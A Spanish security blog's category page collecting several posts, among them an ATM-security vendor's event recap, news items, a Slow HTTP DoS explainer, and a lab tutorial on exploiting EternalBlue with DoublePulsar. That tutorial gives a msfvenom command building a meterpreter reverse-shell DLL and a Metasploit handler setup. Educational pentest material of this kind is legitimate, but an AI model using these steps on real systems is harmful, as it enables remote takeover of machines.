Categoría : Herramientas de Seguridad

Inicio/Archivo por Categoría Herramientas de Seguridad

Éxito total nuestra participación en ATMIA Orlando y ATM & Cash Innovation Panamá

Este año tuvimos el gusto de participar en dos oportunidades en los eventos que organiza ATMIA (ATM industry Association) a nivel internacional, el primero fue en Orlando EEUU y este último en la hermosa Ciudad de Panamá.

Tengo que confesar que en ambos eventos lograron cubrir nuestras expectativas y sobre todo pudimos abrir nuevas oportunidades de negocios en varios países que están interesados en nuestras soluciones de seguridad enfocadas en banca.

Durante el evento en Panamá y Gracias a la valoración del público obtuvimos el título de Mejor Conferencia durante el evento y nuestro Booth fue sin lugar a dudas el mas lleno durante los días del evento, con lo cual y fuera de quedar muy satisfechos con los resultados, pudimos comprobar por la respuesta del público y los bancos que nos visitaron, que vamos por buen camino en el desarrollo de nuestras soluciones de seguridad para banca, llamando así la atención de gigantes como Citibank de EEUU.

Lo bueno de estar de expositores locales, fue que pudimos llevar nuestro propio ATM al ATMIA y realizar demostraciones en vivo, sobre los diferentes tipos de ataques que se están realizando sobre los cajeros ATM en diferentes partes del mundo, comprobando así la eficiencia y eficacia de KAS (Krypto ATM Systems) al momento de detectar desde la apertura del ATM, logins correctos o incorrectos, ejecución de nuevos procesos, integridad de archivos, hasta la conexión de cualquier dispositivo USB en el mismo, reportando de manera inmediata y en tiempo real al correo y celular de la persona indicada para atender estos temas y las diferentes respuestas activas que podemos enviar al ATM para bloquear y evitar que el atacante pueda extraer el dinero.

KAS no solamente se ha convertido en la herramienta mas rápida y versátil en la detección de ciberataques a cajeros ATM, otro de los puntos a favor que nos ha permitido abrir rápidamente mercado dentro la industria de seguridad en cajeros ATM, es que es la primer herramienta de este tipo basada en un motor de Big Data, que permite tener dashboards personalizables, a gusto del cliente y con el precio mas económico que cualquier otra solución de seguridad para cajeros ATM del mercado.

Otra de las soluciones que causó un gran impacto, fue Pentest365, un servicio “Cloud Based” (Basado en la Nube), que se encarga de realizar un Pentesting automatizado 24×7 a toda la infraestructura de TI de una organización, sin importar el tamaño o la diversidad de marcas, sistemas operativos, aplicaciones o tecnologías que se encuentren de por medio. Mas adelante tenemos preparado un post completo a este excelente servicio pero si eres curioso, puedes ver mas información desde el sitio web de Pentest365.

Actualmente contamos con oficinas en Panamá, México y Canadá desde donde afrontamos las diferentes líneas de negocio de la empresa con un excelente equipo profesional de Recursos Humanos.

Pronto les informaremos sobre las novedades en las que estamos trabajando y los nuevos países en los que estaremos dando charlas o presentando nuestros productos. Para cualquier consulta pueden escribirnos a info@ehcgroup.io

How to: explotando Eternalblue + Doublepulsar

Hace pocos días saltaba la noticia de que se el grupo Shadow Brokers había liberado una nueva hornada de exploits de la NSA. Por si esto fuera poco, en el github donde están los exploits también hay información sobre como atacar a los sistemas bancarios.

La gran mayoría de los exploits publicados hacen que comprometer un sistema Windows sea cosa de niños y casi como vemos en las películas, puesto que ente ellos se encuentran varios 0-day (ahora ya parcheados por Microsoft) que atacan al protocolo SMB en todas sus versiones.

De todos los exploits disponibles, el que más ha llamado la atención a la comunidad ha sido el combo del llamado Eternalblue + Doublepulsar. En este post vamos a explicar cómo desplegar un entorno de pruebas donde poder probar los exploits.

(Aclaración: Sobra decir que la información se proporciona a título informativo y didáctico, con objeto de colaborar a mejorar el conocimiento de los técnicos en ciberseguridad. Los cibercriminales no necesitan que nadie les enseñe cómo utilizar los exploits.).

Necesitaremos:

  1. Máquina Virtual Windows atacante.
  2. Maquina Vitrual Windows víctima.
  3. Equipo con Linux.

Una vez desplegadas las máquinas virtuales de Windows, el primer paso es preparar una de ellas como la atacante. En esta debemos satisfacer una serie de requisitos para poder utilizar el framework Fuzzbunch, que es desde donde lanzaremos los exploits. Para ello se debe descargar el repositorio del git donde se han publicado los exploits y herramientas.

Se puede hacer con un “git clone” o descargando el repositorio directamente:

Una vez clonado el repositorio en nuestro equipo, habrá que acceder al directorio Windows que está dentro de EQGRP_Lost_in_Translation y crear la carpeta listeningposts. Si no hacemos esto, al intentar ejecutar Fuzzbunch nos saltará un error avisando de que no encuentra el directorio.

Para poder ejecutar el framework correctamente y sin ningún error se necesita de una versión antigua de Python y de Pywin32:

  1. Python 2.6.6 de 32bits (se ha probado con Python 2.7 y no funciona).
  2. PyWin32-221 para Python 2.6.6.
  3. Jre-6u15-windows-i-586.

Una vez esté todo instalado vamos a pasar a la acción. Aquí utilizaremos powershell pero también se puede hacer mediante cmd.

Uso del Framework Fuzzbunch

Desde el directorio EQGRP_Lost_in_Translation/windows ejecutamos Python fb.py para acceder al framework, e introducimos los siguientes parámetros:

  • Default Default target IP Addres [] : IP de la víctima.
  • Dafault Callback Addres [] : IP de nuestra máquina Windows.
  • Use redirection[yes] : Establecer a ‘no’.
  • Base Log directory [D:\logs] : Establecer la ruta para almacenar los logs.

Acto seguido hay que crear un proyecto. Una vez realizados estos pasos, veremos en el prompt fb>

Ilustración 1 Terminal del framework

Para visualizar qué exploits hay disponibles podemos teclear Show Exploits:

Ilustración 2 Exploits disponibles

Como se ha comentado anteriormente, en este post se va a explicar Eternalblue (auque no salga en la lista, está disponible) junto con Doublepulsar. Muy por encima, Eternalblue se encarga de crear un backdoor y Doublepulsar inyecta una dll en el proceso del sistema que queramos.

Eternalblue

Para hacer uso de Eternalblue hay que teclear use Eternalblue y acto seguido introducir la información solicitada por pantalla:

Ilustración 3 Configurando Eternalblue

Si todo ha salido bien veremos el siguiente mensaje en el terminal:

Ilustración 4 Ejecución terminada con éxito

Doublepulsar

Con la backdor creada con Eternalblue, el próximo paso a realizar es inyectar una dll en un proceso del sistema comprometido haciendo uso de Doublepulsar.

Para generar la dll podemos hacer uso de msfvenom:

msfvenom -a x64 -p windows/meterpreter/reverse_tcp lhost=IP lport=PUERTO -f dll -o raccoon64V2.dll

Y desde metasploit dejar un handler esperando a recibir una conexión desde la máquina comprometida:

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

[..]

Volviendo a Doublepulsar, como en el proceso anterior hay que introducir la información que va apareciendo en el terminal:

Ilustración 5 Configuración Doublepulsar

Si lo hemos hecho todo bien, tendremos en nuestro equipo local un meterpreter con privilegios SYSTEM sobre la máquina virtual víctima. Con unos sencillos pasos y un par de clicks hemos llegado a comprometer un equipo conociendo solo su dirección IP.

Ilustración 6 Sesión de meterpreter

Por último y no menos importante, una vez tengamos la conexión con el meterpreter deberemos volver a ejecutar Doublepulsar y seleccionar la opción:

4) Uninstall           Remove's backdoor from system

Para eliminar la backdoor, puesto que ya no la necesitamos.

Ilustración 7 Eliminación de la backdoor

Como se ha podido observar, resulta alarmante la facilidad con la que se consigue comprometer un sistema Windows haciendo uso de estos exploits.

En estos momentos creo que todo el mundo se estará preguntando: ¿si esto es lo que se ha publicado, que más cosas tendrán los chicos buenos de la NSA?

 

Visto en: SecurityatWork

DARPA empleará superordenadores para detectar posibles errores de seguridad

En las últimas semanas parece que el gobierno de Estados Unidos está más preocupado que nunca en la viabilidad de sus sistemas de seguridad. Debido a esto no es de extrañar que hayan pedido a la Agencia de Proyectos de Investigación Avanzados de Defensa de Estados Unidos, conocida por todos como DARPA, que investigue su viabilidad y los ponga a prueba para detectar posibles problemas derivados del uso de software y sistemas obsoletos.

Una vez la misión ha sido encomendada a DARPA y, como no podía ser de otra manera, sobre todo gracias los fondos gubernamentales de los que goza, la agencia se ha puesto manos a la obra y su idea radica en poner a trabajar a gran parte de los superordenadores que hay en Estados Unidos para conseguir así localizar y resolver cualquier tipo de problema relacionado con los sistemas de seguridad de cualquiera de sus servicios.

DARPA pondrá a trabajar a los superordenadores estadounidense para encontrar problemas de seguridad en el software de sus equipos

Una vez más, DARPA vuelve a demostrar que, para ellos, una máquina está más capacitada que un ser humano. Para conseguir hacer realidad esto, la agencia acaba de organizar un concurso bautizado como Cyber Grand Challenge que será presentado en la DEFCON, conferencia anula de hackeo. En este concurso, siete egrupo de la academia y la industria medirán sus fuerzas contra siete ordenadores del Pentágono para ver quién tiene mayor capacidad.

Entre los equipos que participarán en este campeonato encontramos nada menos que a los ganadores de una competición previa organizada el año pasado. Tras ganar, estos tuvieron acceso a un ordenador dotado de un procesador de 1.000 núcleos y 16 terabits de memoria. Los enfrentamientos entre humanos y superordenadores se llevarán a cabo sin ninguna intervención humana. El ganador conseguirá un premio de 2 millones de dólares y una invitación para medir sus fuerzas con hackers humanos en la contienda de atrapa la bandera de la DEFCON

Fuente: actualidad gadget

Más seguridad en Whatsapp con la autenticación en dos pasos

En la ‘seguridad de cuentas online’ existen diferentes sistemas como la contraseña, el código PIN o incluso la seguridad biométrica a través de la huella dactilar. Pero entre todos estos, uno de los más eficaces es la ‘autenticación en dos pasos’, que consiste en la utilización de cualquiera de los sistemas anteriores en un primer procedimiento, y el ‘contraste’ de la identidad del usuario a través de un mensaje SMS que es enviado a su dispositivo móvil con una clave única, en el segundo paso. Y este sistema es precisamente el que está probando en WhatsApp, según se ha podido conocer antes de que sea desplegado de forma generalizada.

 WhatsApp se podrá proteger con contraseña y autenticación en dos factores, pero ahora pedirá una cuenta de correo electrónico
En las próximas semanas debería producirse la llegada de los GIF y las videollamadas, que son las novedades filtradas más recientemente, pero al mismo tiempo WhatsApp trabaja en este sistema de seguridad. De momento está presente en la versión 2.16.183 de WhatsApp para dispositivos Android, es decir, una versión beta. Y junto a este sistema de seguridad, que anteriormente explicábamos cómo funciona en servicios online en los que ya está operativo desde tiempo atrás, como Gmail, vendrá también la posibilidad de recuperar la contraseña de nuestra cuenta de WhatsApp a través de una dirección de correo electrónico de recuperación.

Es decir, que según estos datos filtrados de una de las versiones próximas de WhatsApp, el servicio contará ahora con una contraseña de protección de cuenta y su sistema de autenticación en dos factores para que, aunque alguien descubra nuestra contraseña, no pueda acceder de forma directa a la cuenta. Ahora bien, esto quiere decir también que WhatsApp recopilará nuevos datos sobre los usuarios, como es una dirección de correo electrónico asociada a la cuenta, mientras que hasta la fecha era necesario únicamente aportar un número de teléfono.

Y aunque ya sabemos cómo funciona el sistema de autenticación en dos factores por el uso que se hace de él en servicios similares, todo apunta a que WhatsApp añadirá algunas particularidades como, por ejemplo, que el ‘código de uso único’ se compondrá de seis dígitos. En cualquier caso, hasta el lanzamiento de la nueva característica es complicado conocer con mayor precisión la aplicación que WhatsApp tiene planteada para este sistema de seguridad.

Fuentecinco días

La histórica sentencia que ganó Microsoft para no tener que entregar tus datos privados a las autoridades

Un tribunal de apelaciones en Estados Unidos determinó que las autoridades nacionales no pueden forzar al gigante de la informática Microsoft a entregarles información contenida en servidores alojados en otros países.

La decisión sienta un precedente histórico en materia de protección de la privacidad para servicios de computación en la nube.

“Deja claro que el gobierno de Estados Unidos no puede utilizar órdenesjudiciales en forma unilateral para llegar a otros países y obtener los correos electrónicos que pertenecen a personas de otras nacionalidades“, le dijo a la BBC Brad Smith, presidente y jefe legal de la compañía.

“Le dice a la gente que puede, de verdad, confiar en la tecnología, cuando optan por mover su información a la nube”, añadió.

Derechos digitales

El caso llegó a los tribunales después de que Microsoft se negara a otorgarle acceso al Departamento de Justicia a un servidor en Irlanda, como parte de una investigación en un expediente relacionado con drogas. Un tribunal en Manhattan le dio luz verde al Departamento de Justicia en 2014. Pero la corte de apelaciones deshizo esa decisión.

Le dice a la gente que puede, de verdad, confiar en la tecnología, cuando optan por mover su información a la nube” – Brad Smith, portavoz de Microsoft

El Departamento de Justicia rechazó el fallo e indicó que estaba evaluando el siguiente paso.

Si resuelve apelar, el caso caería en manos de la Corte Suprema de Justicia.

Varias empresas, como Amazon, Apple y Cisco, respaldaron a Microsoft en el caso.

Otra de las organizaciones que estuvo de su lado fue el Open Rigths Group, una ONG en Reino Unido que defiende los derechos digitales.

“La decisión del tribunal estadounidense mantiene el derecho a la privacidad individual frente la intrusión del Estado estadounidense en la libertad personal”, declaró el director legal del grupo, Myles Jackman.

“La decisión del tribunal estadounidense mantiene el derecho a la privacidad individual frente la intrusión del Estado estadounidense en la libertad personal” Myles Jackman, Open Rights Group

“En consecuencia, los organismos de seguridad de Estados Unidos deben respetar el derecho a la privacidad digital de los ciudadanos europeos y la protección de sus datos personales“.

“Los Estados no deberían ir más allá de sus fronteras simplemente porque creen que, al hacerlo, pueden amedrentar a las compañías”, añadió.

Juego abierto a todos

Microsoft había advertido que permitir que se ejecutara la orden de judicial desataría un “juego abierto”, en el que otros países podían tratar de implementar órdenes similares para acceder a servidores ubicados en Estados Unidos.

Haciéndose eco de preocupaciones ampliamente extendidas en la industria tecnológica, la empresa sostuvo que, simplemente, las leyes estaban demasiado desactualizadas como para resultar efectivas.

Satya Nadella en una aparición pública en San FranciscoEl jefe de Microsoft, Satya Nadella, ha hecho de la computación en la nube y su seguridad el gran foco de la compañía.

La protección de la privacidad y las necesidades de las autoridades a cargo de hacer cumplir la ley requieren de nuevas soluciones que reflejen el mundo que existe hoy, en vez de tecnologías que existían hace tres décadas, cuando se aprobaron las leyes que están vigentes”, señaló la empresa.

Entre los organismos a cargo de velar por la seguridad, el orden y la legalidad hay una preocupación importante acerca de la posibilidad de que el almacenamiento en la red, junto a la encriptación, esté ofreciendo un espacio en el que los criminales pueden actuar a sus anchas.

Los límites de la cooperación

La juez Susan Carney, a cargo del expediente, falló en contra del Departamento de Justicia sobre la base de que la Ley de Comunicaciones Almacenadas (SAC, por sus siglas en inglés) de 1986 limitaba el alcance de las órdenes judiciales aplicables fuera de Estados Unidos.

La juez señaló que esas restricciones son vitales para mantener buenas relaciones con otros países.

Aun más, dijo que hay mecanismos para la cooperación entre naciones el curso de las investigaciones, aunque las autoridades con frecuencia se quejan de que tomar ese camino es más costoso y consume más tiempo.

Una persona usando una computadora
A las autoridades les preocupa que la nube le proporcione un “espacio seguro” a los criminales para operar.

“Ir a tribunales para pedir una orden bajo la SCA normalmente es más rápido que recurrir a los canales internacionales de resolución”, dijo Daniel Stoller, editor legal senior de la firma Bloomberg Law Privacy & Security News.

Stoller señaló que la sentencia original de 2014 interpretó la SCA de manera que favoreciera la visión del Departamento de Justicia. Pero la apelación le dio prioridad a la legislación internacional.

Otro juez involucrado en el juicio, Gerard Lynch, afirmó que la ley de 1986 necesitaba una actualización urgentemente.

“Estoy de acuerdo con el resultado”, escribió.

“Pero no creo de ninguna manera que el resultado debe ser tomado como algo que se convertirá en política racional, ni mucho menos celebrado como un hito en materia de protección de la privacidad“.

Fuente: BBC

Ataques web DDoS “Slow HTTP” mediante SlowHTTPTest

Los ataques “Slow HTTP” en aplicaciones web se basan en que el protocolo HTTP, por diseño, requiere que las peticiones que le llegan sean completas antes de que puedan ser procesadas. Si una petición HTTP no es completa o si el ratio de transferencia es muy bajo el servidor mantiene sus recursos ocupados esperando a que lleguen el resto de datos. Si el servidor mantiene muchos recursos en uso podría producirse una denegación de servicio (DoS).

Estos tipos de ataque son fáciles de ejecutar debido a que una sola máquina es capaz de establecer miles de conexiones a un servidor y generar miles de peticiones HTTP sin terminar en un período muy corto de tiempo utilizando un ancho de banda mínimo.

Podemos dividirlos en cuatro tipos distintos según la técnica utilizada y lo bueno es que desde hace años podemos probarlos todos mediante la herramienta Open-Source SlowHTTPTest que podemos instalar fácilmente en nuestro Kali Linux y también en otras distros de Linux, OSX y en Windows con Cygwin. Además se puede descargar desde el repositorio de Github.

apt-get install slowhttptest

Veamos entonces estos cuatro tipos de técnicas/ataques y un ejemplo del uso de SlowHTTPTest para probarlos:

  • Slow Headers (Slowloris): consiste en enviar las cabeceras HTTP incompletas (sin el CRLF final que indica el final del header) de tal forma que el servidor no considera las sesiones establecidas y las deja abiertas afectando al número de conexiones máximas configuradas o maxclients.
  • Slow HTTP Post body (R-U-Dead-Yet): se envían peticiones POST con la cabecera HTTP completa e incluyendo un “Content-Length” con el tamaño en bytes del POST DATA a enviar. Luego se envían menos bytes que los indicados haciendo al servidor esperar sin rechazar la conexión.
  • Basado en Range (Apache killer): se crean numerosas peticiones superponiendo rangos de bytes en la cabecera (HTTP ranges) agotando los recursos de memoria y CPU del servidor.
  • Slow Read: en este caso se envían peticiones HTTP legítimas pero se ralentiza el proceso de lectura de la respuesta retrasando el envío de ACK (HTTP es TCP).

Fuente: Segu Info

Pentest Box

Uno de los principales problemas al hacer auditorias de seguridad son las herramientas que están disponibles en los diferentes sistemas operativos (Windows, GNU/Linux), uno de los dolores de cabeza es la instalación de paquetes python, ruby, y perl, en sistemas Windows, o el uso de maquinas virtuales (cuando se tiene pocos recursos de CPU y RAM en la maquina).

PENTEST BOX.

Es una herramienta que permite ejecutar herramientas de pentesting en entornos windows a través del  CMD, no tiene que ser instalado y el uso de recursos es mínimo, de esta manera no es necesario el uso de una maquina virtual. Fue creado debido a que más del 50% de los usuarios de distribución de pruebas de penetración utiliza ventanas.Por lo que proporciona una plataforma eficiente para las pruebas de penetración en la plataforma de Windows.

Características que presenta PentestBox.

  • Funciona directamente en Windows de forma nativa, lo que ganaremos en rendimiento.
  • No necesita dependencias, todo esta incorporado en pentestbox.
  • Solo se necesitan 2GB de espacio en disco y 20MB de ram al ejecutar alguna herramienta.
  • Es portable, no es necesario instalarlo se puede llevar en una memoria USB.
  • Tiene soporte para maquinas 32-bits.
  • PentestBox puede ser compartida en una carpeta en la red de trabajo.

Herramientas que incorpora PentestBox

Las herramientas de pentestbox están ordenadas en las siguientes categorías:

  • Escáners de Vulnerabilidades Web
  • Proxies Aplicaciones Web
  • Rastreadores Web
  • Recopilación De Información
  • Herramientas de Explotación
  • Fuerza bruta a las contraseñas
  • Seguridad en Android
  • Ingeniería Inversa
  • Herramientas de Stress
  • Sniffers
  • Herramientas Análisis Forense
  • Ataques y Auditorias Wireless
  • Editores de Texto

Acá pueden ver una demo, en la que pueden observar el funcionamiento de pentestbox y algunas herramientas.

Para poder saber mas sobre esta herramienta dejare los enlaces de descarga y la documentación de pentestbox.

URL’s:

Descarga directa de PentestBox.

Documentación de PentestBox.